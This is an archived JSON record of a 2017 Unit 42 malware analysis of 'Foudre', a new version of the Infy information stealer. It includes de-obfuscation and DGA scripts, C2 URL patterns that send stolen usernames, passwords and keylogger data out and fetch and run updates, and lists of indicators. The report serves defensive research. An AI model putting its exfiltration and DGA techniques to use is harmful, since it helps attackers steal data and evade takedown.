{
	"id": "5a0d279c-201f-4bfb-a99e-282c3fb1287a",
	"created_at": "2026-04-06T00:19:12.022932Z",
	"updated_at": "2026-04-10T03:36:22.865131Z",
	"deleted_at": null,
	"sha1_hash": "674eda55f8b66c8c70a785ab92f8c527cf36b91f",
	"title": "Prince of Persia – Ride the Lightning: Infy returns as “Foudre”",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1072400,
	"plain_text": "Prince of Persia – Ride the Lightning: Infy returns as “Foudre”\r\nBy Tomer Bar, Simon Conant\r\nPublished: 2017-08-01 · Archived: 2026-04-02 10:39:21 UTC\r\nIntroduction\r\nIn February 2017, we observed an evolution of the “Infy” malware that we're calling \"Foudre\" (\"lightning\", in French). The\r\nactors appear to have learned from our previous takedown and sinkholing of their Command and Control (C2) infrastructure\r\n– Foudre incorporates new anti-takeover techniques in an attempt to avoid their C2 domains being sinkholed as we did in\r\n2016.\r\nWe documented our original research into the decade-old campaign using the Infy malware in May 2016. A month after\r\npublishing that research, we detailed our takeover and sinkholing of the actor’s C2 servers. In July 2016, at Blackhat U.S.,\r\nClaudio Guarnieri \u0026 Collin Anderson presented evidence that a subset of the C2 domains redirecting to our sinkhole were\r\nblocked by DNS tampering and HTTP filtering by the Telecommunication Company of Iran (AS12880), preventing Iran-domestic access to our sinkhole.\r\nBelow, we document these changes to the malware, and highlight some ongoing mistakes and how we leveraged them to\r\nlearn more about this campaign.\r\nFoudre\r\nThis new version of Infy uses a window name “Foudre” for keylogging recording (Figure 1).\r\nFigure 1 \"Foudre\" window for keylogging\r\nThe logic and structure of Foudre is very similar to the original Infy malware. Most of the code remains the original Delphi\r\nprogramming, with an additional crypto library, and a new de-obfuscation algorithm.\r\nFoudre’s capabilities\r\nFoudre is, like its Infy predecessors, an information stealer. It includes a keylogger, and captures clipboard contents on a ten-second cycle. It collates system information including process list, installed antivirus, cookies, and other browser data.\r\nThe malware checks for internet connectivity simply by looking for an “HTTP 200” response to a connection to google.com.\r\nIt includes the ability to check for and download any updates to itself.\r\nThis “improved Infy” determines the C2 domain name using a Domain Generation Algorithm (DGA). It then validates that\r\nthe C2 domain is authentic. The C2 returns a signature file, which the malware decrypts and compares it with a locally-https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 1 of 12\n\nstored validation file.\r\nOnce the validity of the C2 is confirmed, stolen data is exfiltrated with a simple HTTP POST.\r\nInfection\r\nThe initial infection vector is a classic spear-phishing email, including a self-executable attachment. When clicked, this\r\nexecutable installs an executable loader, a malware DLL, and a decoy readme file (very typical of Infy).\r\nFor first run, the loader calls the DLL with export D1 for setup, creating the installation folder \"%all users%\\app\r\ndata\\SnailDriver V\u003cversion number\u003e\". The loader copies itself as “config.exe”, and the DLL with random name (for\r\nexample “q.d”), to this folder. The version number (for example “1.49”) and DLL name vary between Foudre samples.\r\nThe loader writes itself to autostart in the registry. The DLL is loaded by rundll32.exe only after restarting, when the “lp.ini”\r\nfile in the same folder contains a numeric value.\r\nFoudre uses a similar mechanism as Infy to check if the computer is already infected. It checks for the existence of a specific\r\nwindow “foudre\u003ctrojan version number\u003e” with window class “TNRRDPKE”.\r\nThe final version of the original Infy malware that we observed was 31. We have so far observed Foudre versions 1 and 2\r\n(Figure 2).\r\nFigure 2 \"Foudre\" version, window exists check mechanism\r\nAlso embedded is the following German text (Figure 3):\r\n\"Sie soll Auskunft über Zschäpes Verhalten in der Untersuchungshaft geben - daran dürften auch die Opferanwälte Interesse\r\nhaben.\"\r\nTranslated to English:\r\n“She is supposed to provide information about Zschaepe's behavior in the investigative detention period, which should also\r\nbe of interest for the victims' attorneys.”.\r\nFigure 3 Embedded German text\r\nBeate Zschäpe is a German right-wing extremist and an alleged member of the Neo-Nazi terror group National Socialist\r\nUnderground (NSU).\r\nThe text appears to be copied verbatim from the caption to the first photograph in this news article from February 2017:\r\nhttp://www.sueddeutsche.de/politik/nsu-prozess-zschaepes-verteidiger-will-jva-beamtin-als-zeugin-hoeren-1.3379516\r\n(Figure 4).\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 2 of 12\n\nFigure 4 Newspaper article source of embedded text\r\nWe saw similar embedded-text snippets in Infy samples, in German, Dutch, and English. It is unclear what the function of\r\nthis embedded text is.\r\nString de-obfuscation\r\nFigure 5 String De-obfuscation function\r\nThis Python script de-obfuscates a single string:\r\ndef decrypt(enc_str):\r\n            index = 0\r\n            xorKey_mul = 1\r\n            xorkey = 0\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 3 of 12\n\ndec_str = \"\"\r\nfor i in range (0,len(enc_str)/2):\r\n     twoByte = enc_str[index:index+2]\r\n   index+=2\r\n  xorkey = xorKey_mul \u0026gt;\u0026gt; 8\r\n     towByte_hex = ord(twoByte.decode('hex'))\r\n     dec_byte = towByte_hex ^ xorkey\r\n   dec_str+=chr(dec_byte)\r\n   towByte_hex+= xorKey_mul\r\n   xorKey_mul=xorKey_mul*towByte_hex\r\n     xorKey_mul= xorKey_mul \u0026amp; 0xffff\r\nreturn dec_str\r\nThis IDA Python script adds comments to IDA with all clear text strings:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\nimport os,sys\r\ndef find_function_arg(addr):\r\n  while True:\r\n    addr = idc.PrevHead(addr)\r\n    if GetMnem(addr) == \"mov\" and \"eax\" in GetOpnd(addr, 0):\r\n      return GetOperandValue(addr, 1)\r\n  return \"\"\r\ndef get_string(addr):\r\n  out = \"\"\r\n  i = 200\r\n  cnt=0\r\n  while Byte(addr)\u0026gt; 0 or Byte(addr+1)\u0026gt;0:\r\n    if Byte(addr) != 0:  \r\n      out += chr(Byte(addr))\r\n    addr += 1\r\n    cnt+=1\r\n    if cnt==i:\r\n        return None\r\n  return out\r\nprint \"[*] Attempting to decrypt strings in malware: \"\r\nfor x in XrefsTo(0x009F5410, flags=0):\r\n    ref = find_function_arg(x.frm)\r\n    string = get_string(ref)\r\n    if string is not None:\r\n        dec = decrypt(string)\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 4 of 12\n\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n        print \"Ref Addr: 0x%x | Decrypted: %s\" % (x.frm, dec)\r\n    else:\r\n        print \"Ref Addr: 0x%x is None\" % (x.frm)\r\n    MakeComm(x.frm, dec)\r\n    MakeComm(ref, dec)\r\nC2 Defense\r\nLearning from our takedown of the actor’s previous C2 infrastructure, this version implements two new C2 mechanisms in\r\nan attempt to avoid C2 takeover.\r\nThey are now using DGA for C2 domains. They have also implemented an RSA signature verifying algorithm to check the\r\nveracity of a C2 domain.\r\nDomain Generation Algorithm\r\nThe domain name is calculated using this algorithm:\r\nToHex(CRC32(\"NRV1\" + year + month + week_number)) + (\".space\"|\".net\"|\".top\")[\r\n(Thanks to Palo Alto Networks researcher Esmid idrizovic for reversing this). The following script can be used to generate\r\ndomain names using this algorithm:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\nimport binascii\r\nimport datetime\r\ndef getHostCRC(input):\r\n    crc = binascii.crc32(input) \u0026amp; 0xffffffff\r\n    host = \"{:08x}\".format(int(crc))\r\n    return host\r\ndef getDomains(date):\r\n    domains = [\".space\"]\r\n    results = []\r\n    weeknumber = date.isocalendar()[1]\r\n    s = \"NRV1{}{}{}\".format(date.year, date.month, weeknumber)\r\n    hostname = s\r\n    host = getHostCRC(hostname) + domains[0]\r\n    results.append(host)\r\n    for d in domains:\r\n        for i in range(1, 101):\r\n            hostname = s + str(i)\r\n            host = getHostCRC(hostname) + d\r\n            results.append(host)\r\n    return results\r\ngetDomainsForNextWeeks(number_of_weeks):\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 5 of 12\n\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n    date = datetime.datetime.now()\r\n    date -= datetime.timedelta(days=7)\r\n    n = 1\r\n    date_to = date + datetime.timedelta(days=7*number_of_weeks)\r\n    print \"Generating domains for: {} - {}.\\nEach domain can have .space, .net or .top as TLD (top level\r\ndomain).\\n\\n\".format(date, date_to)\r\n    for i in range(number_of_weeks):\r\n        tmp = getDomains(date)\r\n        top_domains = tmp[:20]\r\n        weeknumber = date.isocalendar()[1]\r\n        print \"{}. {} - Week Number: {}\".format(n, date, weeknumber)\r\n        for domain in top_domains:\r\n            print \"{}\".format(domain)\r\n        date += datetime.timedelta(days=7)\r\n        n = n + 1\r\n        print \"\"\r\ngetDomainsForNextWeeks(10)[\r\nFigure 6 CRC32 code in the DGA algorithm\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 6 of 12\n\nPrevious and current C2 domains are detailed in Appendix I. All point at the same C2 server on 198.252.108[.]158, located\r\nin Canada, using DNS servers ns1.2daa46f1[.]space and ns2.2daa46f1[.]space.\r\nThe DNS RNAME is henry55.iname[.]com, though we were not able to find any other reference to this email address\r\noutside of the context of this campaign.\r\nC2 signature verification\r\nFoudre uses the lockbox3 Delphi library to verify the C2:\r\n1. Download signature file from the generated domain name C2 with GET request:\r\nGET /de/?d=2017149\u0026t=2017%2D5%2D29%2D%2D12%2D16%2D33\r\nd= {year}{number of days since the beginning of the year}\r\nt = Current time, urlencoded.\r\n2. Save the signature in %appdata%\\sig.tmp.\r\n3. Write the clear text string\r\n{domainname}{year}{number of days since the beginning of the year}\r\nin %appdata%\\dom.tmp.\r\nThe current date is downloaded from http://feeds.skynews[.]com/feeds/rss/home.xml \u003clastBuildDate\u003e field.\r\n4. Decrypt the signature file with the public key (stored in %all users%\\application data\\snailDriver\r\nV\u003cversion\u003e\\pub.key)\r\n5. Compare the result with the dom.tmp clear text string.\r\nFigure 7 Download Signature Verification\r\nAfter the domain is verified, it checks if a new trojan update version is needed with these posts:\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 7 of 12\n\nhttp://\u003cC2domain\u003e/2014/?c=\u003ccomputername\u003e\u0026u=\u003cusername\u003e\u0026v=\u003cversion\u003e\u0026s=\u003cpassword\u003e\u0026f=\u003cfolder\u003e\u0026mi=\r\n\u003cmachineguid_urlencoded\u003e\u0026b=\u003c32/64bit\u003e\u0026t=\u003ctime_urlencoded\u003e\r\nhttp://\u003cC2domain\u003e/2015/?c=\u003ccomputername\u003e\u0026u=\u003cusername\u003e\u0026v=\u003cversion\u003e\u0026s=\u003cpassword\u003e\u0026f=\u003cfolder\u003e\u0026mi=\r\n\u003cmachineguid_urlencoded\u003e\u0026b=\u003c32/64bit\u003e\u0026t=\u003ctime_urlencoded\u003e\r\nThe first request (2014 folder) downloads any new trojan version to %temp%\\gtsdch32.tmp. The second request (2015\r\nfolder) downloads a second signature file to %temp%\\gtsdci32.tmp.\r\nThe malware then performs a second RSA signature verification using the public key. If the verification is successful, the\r\nnew trojan version (gtsdch32.tmp) is executed with this command line:\r\ngtsdch32.tmp -sp/set -pRBA4b5a98Q\r\nWe observed a very similar command structure in the original Infy malware:\r\n\"sp/ins -pBA5a88E\".\r\nOne of the update parameters (download and execute) contains references indicating that there is also a 64bit version of\r\nFoudre.\r\nWe also found that the request \u003cC2\u003e/f/?d=\u003cfilename\u003e is redirected to \u003cC2\u003e/f/\u003cfilename\u003e.tmp. This parameter is not\r\nsupported by the agent, so it is likely a server-side redirection used by the update mechanism.\r\nThe malware then encrypts the keylogger data and system information, and sends to the C2 with this post:\r\nhttp://\u003cC2\u003e/en/d=\u003cdate\u003e,text=\u003cdata\u003e\r\nMapping the victims\r\nWe forecast one of the DGA domain names and registered it before the adversary.\r\nThe victims attempted to connect to a C2 on that domain, but without the RSA private key we could not verify our domain\r\nto them. However, we are able to map the victim locations using GeoIP (Figure 8).\r\nWe note a preponderance of Iranian-domestic victims, very reminiscent of the Infy campaigns. Efforts against the United\r\nStates and Iraq are also familiar. And once again, the very small number of targets hints at a non-financial motivation.\r\nOne of the Iraq victims uses an IP in the same class C network as one of an observed Infy victim, suggesting that the\r\nadversary is targeting the same specific organization, or even computer.\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 8 of 12\n\nFigure 8 Geographic spread of victims\r\nAlthough without the RSA private key, we were unable to establish communications with any victims, we discovered that by\r\nsending an invalid signature file to the victim, owing to a lack of input validation of the signature file content/size, we can\r\ncrash the rundll32 process running the Foudre malicious DLL, disabling the infection until the victim reboots.\r\nConclusion\r\nIn our Prince of Persia blog, we noted that this campaign had been active for at least a decade. We followed up with our\r\nPrince of Persia: Game Over blog, documenting our takedown and sinkholing of the adversary’s C2 infrastructure.\r\nRegarding the actions by the Telecommunication Company of Iran to prevent the C2s from resolving to our sinkhole, \r\nGuarnieri \u0026 Anderson note “The filtering policy indicates that Iranian authorities had specifically intervened to block\r\naccess to the command and control domains of a state aligned intrusion campaign at a country level”.\r\nWe shouldn’t be surprised then to see Infy return – fundamentally the same malware, targeting the same victims.\r\nThe actors understand that they needed a more robust C2 infrastructure to prevent infiltration and takedown. DGA adds\r\nsome resilience, but is not impervious to takeover.\r\nHowever, using digital signing is an effective C2 defense mechanism. Without access to the private keys, it’s not possible to\r\nimpersonate a C2 even if a DGA domain is registered by a researcher. It’s possible that the private keys are held locally on\r\nthe C2 server, but without access to the C2 we can’t confirm this particular potential vulnerability in their infrastructure.\r\nPrince of Persia is persistent, indeed.\r\nCoverage\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\n1. WildFire accurately identifies all malware samples related to this operation as malicious.\r\n2. Traps prevents this threat on endpoints, based upon WildFire prevention.\r\n3. Domains used by this operation have been flagged as malicious in Threat Prevention.\r\nAutoFocus users can view malware related to this attack using the “Foudre” tag.\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 9 of 12\n\nIOCs can be found in the appendices of this report.\r\nAppendix I – C2 infrastructure IoCs\r\nAs of time of publishing, the actor had registered DGA domains corresponding to dates through end-July 2017. Although the\r\nDGA algorithm allows the Top-Level Domains (TLDs) of “.space”, ”.net” and “.top”, we note predominantly “.space”\r\ndomain registrations, just one “.top”, and no “.net”. Of special interest is multiple “.site” domains resolving to the C2 IP\r\naddress. We suspect that this may be different malware – possibly, as we saw with the previous Prince of Persia\r\ninvestigations, an as-yet unidentified more full-featured Infy/Foudre variant.\r\nns1.2daa46f1[.]space\r\nns2.2daa46f1[.]space\r\n017eab31[.]space\r\n01ead12b[.]space\r\n0ca0453a[.]site\r\n14c7e2dc[.]space\r\n15bb747b[.]site\r\n15ce27c5[.]site\r\n16e53040[.]space\r\n17ecf559[.]site\r\n1cb3c4c0[.]space\r\n1d4ee030[.]space\r\n23dafa1e[.]space\r\n2daa46f1[.]space\r\n341a436d[.]space\r\n3828b6ed[.]site\r\n39451f31[.]space\r\n3a6e08b4[.]site\r\n3c6e6571[.]space\r\n3e8718c3[.]site\r\n3f4572f4[.]site\r\n431d73fb[.]space\r\n43ec206d[.]top\r\n4b6955e7[.]space\r\n4e422fa7[.]space\r\n4f2f867b[.]site\r\n5aad7667[.]space\r\n60ebc5cf[.]site\r\n61e200d6[.]space\r\n62c91753[.]site\r\n63c0d24a[.]space\r\n6bb4f456[.]space\r\n76ede1bd[.]space\r\n7ba775ac[.]site\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 10 of 12\n\n8447b18a[.]space\r\n869182ff[.]site\r\n884efdfb[.]space\r\n8cc7767f[.]site\r\n8dceb366[.]space\r\n8ee5a4e3[.]site\r\n8fec61fa[.]space\r\n9155ccba[.]space\r\n9877fa8b[.]space\r\n98e38091[.]space\r\n9c1f58ab[.]site\r\n9f233843[.]space\r\na20af0d2[.]space\r\na367590e[.]site\r\na4a55efc[.]space\r\na64c234e[.]site\r\nb4a3174b[.]space\r\nc4c9e3c4[.]space\r\nc5aeee9c[.]site\r\nd14b13d8[.]site\r\nd260045d[.]space\r\nd3a26e6a[.]space\r\nd4606998[.]site\r\nd50dc044[.]space\r\nd74b7e1d[.]space\r\ne00dc810[.]space\r\ne652fc2c[.]space\r\neb18683d[.]site\r\nf196b269[.]site\r\nf8eb516c[.]space\r\nf9e29475[.]site\r\nfac983f0[.]space\r\nfbc046e9[.]site\r\n198.252.108[.]158 Hawkhost Canada – Dedicated hosting (all current resolutions malicious).\r\nNote that we identified several other IP addresses historically related to some of these domains, but research concludes that\r\nthese are registrar-default hosts rather than C2 servers.\r\nAppendix II – Hashes\r\n2b37ce9e31625d8b9e51b88418d4bf38ed28c77d98ca59a09daab01be36d405a\r\n4d51a0ea4ecc62456295873ff135e4d94d5899c4de749621bafcedbf4417c472\r\n7ce2c5111e3560aa6036f98b48ceafe83aa1ac3d3b33392835316c859970f8bc\r\n7e73a727dc8f3c48e58468c3fd0a193a027d085f25fa274a6e187cf503f01f74\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 11 of 12\n\nda228831089c56743d1fbc8ef156c672017cdf46a322d847a270b9907def53a5\r\n6bc9f6ac2f6688ed63baa29913eaf8c64738cf19933d974d25a0c26b7d01b9ac\r\n7c6206eaf0c5c9c6c8d8586a626b49575942572c51458575e51cba72ba2096a4\r\ndb605d501d3a5ca2b0e3d8296d552fbbf048ee831be21efca407c45bf794b109\r\nAppendix III – RSA signature verifying\r\nReplicating the malicious c2 server domain 39451f31[.]space:\r\ndom file:\r\n39451f31.space2017138\r\nsig file:\r\n089EABE330EFD99602C164E889B44E16B8284BB1834A29F16C4BE8CE52FF507F9592E541DBEF85F3C15312583057CB1151B4027C22FB9A776\r\npublic key\r\n4E0A4C6F636B426F783301000000030001000015DEAED84DB7C292D7DEB01D5EB8DBE40A289736E9050B60E11DF90AAEEA6D1504D1D5056\r\nSource: https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nhttps://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/"
	],
	"report_names": [
		"unit42-prince-persia-ride-lightning-infy-returns-foudre"
	],
	"threat_actors": [
		{
			"id": "f763fd1f-f697-40eb-a082-df6fd3d13cb1",
			"created_at": "2023-01-06T13:46:38.561288Z",
			"updated_at": "2026-04-10T02:00:03.024326Z",
			"deleted_at": null,
			"main_name": "Infy",
			"aliases": [
				"Operation Mermaid",
				"Prince of Persia",
				"Foudre"
			],
			"source_name": "MISPGALAXY:Infy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "59c9f31b-e032-44b9-bf3b-4f2cb3d17e39",
			"created_at": "2022-10-25T16:07:23.734244Z",
			"updated_at": "2026-04-10T02:00:04.731031Z",
			"deleted_at": null,
			"main_name": "Infy",
			"aliases": [
				"APT-C-07",
				"Infy",
				"Operation Mermaid",
				"Prince of Persia"
			],
			"source_name": "ETDA:Infy",
			"tools": [
				"Foudre",
				"Infy",
				"Tonnerre"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434752,
	"ts_updated_at": 1775792182,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/674eda55f8b66c8c70a785ab92f8c527cf36b91f.pdf",
		"text": "https://archive.orkl.eu/674eda55f8b66c8c70a785ab92f8c527cf36b91f.txt",
		"img": "https://archive.orkl.eu/674eda55f8b66c8c70a785ab92f8c527cf36b91f.jpg"
	}
}